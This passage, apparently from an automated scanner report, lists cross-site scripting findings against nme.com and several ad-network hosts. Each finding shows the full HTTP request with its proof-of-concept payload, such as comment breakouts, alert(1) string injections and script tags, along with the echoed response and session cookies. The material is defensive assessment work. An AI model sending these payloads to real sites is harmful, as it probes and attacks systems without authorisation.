Date: Mon, 09 May 2011 14:05:22 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:05:22 GMT; path=/; domain=.nme.com
Content-Length: 38330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (adcode5f92a-->a012285e929) -->
...[SNIP]...
3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4623e-->5187d24571d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4623e-->5187d24571d HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:07:08 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 95cbd9249f56d01c751526782057b0f9773659d7"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014960765838623"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:07:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:07:08 GMT
Connection: close
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:07:08 GMT; path=/; domain=.nme.com
Content-Length: 38335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (favicon.ico4623e-->5187d24571d) -->
...[SNIP]...
3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /hotspot/channel/news

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b0c83-->8f638c4fb79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /hotspotb0c83-->8f638c4fb79/channel/news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:06:55 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 71377e3929ad2c9d7c33f66221ca8d2eecc2c7e2"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 23|[{"Type":"LOG"},"cs: "]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3480"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.14782190322876"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:06:56 GMT
Date: Mon, 09 May 2011 14:06:56 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (hotspotb0c83-->8f638c4fb79) -->
...[SNIP]...
3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3224f-->39280491a0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news3224f-->39280491a0b/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:53 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: d61b71039b6d7937222aa72b09ebd0b3767435a0"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3720"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 39|[{"Type":"LOG"},"ts: 0.22853589057922"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 09 May 2011 14:00:53 GMT
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:53 GMT; path=/; domain=.nme.com
Content-Length: 38326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (news3224f-->39280491a0b) -->
...[SNIP]...
3.120. http://ib.adnxs.com/ttj [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d55b5'-alert(1)-'503ac68ed32 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d55b5'-alert(1)-'503ac68ed32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCg6Z_uBBCg6Z_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:05:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:05:20 GMT
Content-Length: 673

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=_-cwX16AyT__5zBfXoDJPwAAACAEVvI__-cwX16A
...[SNIP]...
jC6AIQo6ULGAAg8dUBKAAx_-cwX16AyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EKa3AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.google.com/search%3Fhl=en%26q=d55b5'-alert(1)-'503ac68ed32">
...[SNIP]...
3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57ab9'%3balert(1)//75a18298652 was submitted in the cli cookie. This input was echoed as 57ab9';alert(1)//75a18298652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e57ab9'%3balert(1)//75a18298652; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7252

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30374648_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-30374648_1304949625,11f8f328940989e57ab9';alert(1)//75a18298652,polit,am.h-am.b;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949612198?","300","250",false);</scr'+'ipt>
...[SNIP]...
3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 286a4'%3balert(1)//be060bc01e5 was submitted in the cli cookie. This input was echoed as 286a4';alert(1)//be060bc01e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e286a4'%3balert(1)//be060bc01e5; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7800

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-73291953_1304949599","http://ad.doubleclick.net/adj/q1.q.gc.6170/news;net=q1;u=,q1-73291953_1304949599,11f8f328940989e286a4';alert(1)//be060bc01e5,polit,am.h-am.b;;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg=am.h;btg=am.b;ord=949588501?","728","90",false);</scr'+'ipt>
...[SNIP]...
3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1bb2"%3balert(1)//32ec09e96ad was submitted in the cli cookie. This input was echoed as a1bb2";alert(1)//32ec09e96ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ea1bb2"%3balert(1)//32ec09e96ad; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:58 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:58 GMT
Content-Length: 7798

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=698857285;redirect=http://a.collective-media.net/datapair?net=qc&id=11f8f328940989ea1bb2";alert(1)//32ec09e96ad&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);CollectiveM
...[SNIP]...
3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload a192f<script>alert(1)</script>b5cb7f113c8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046a192f<script>alert(1)</script>b5cb7f113c8', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12
...[SNIP]...
3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f54bf<script>alert(1)</script>340b005e8ea was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

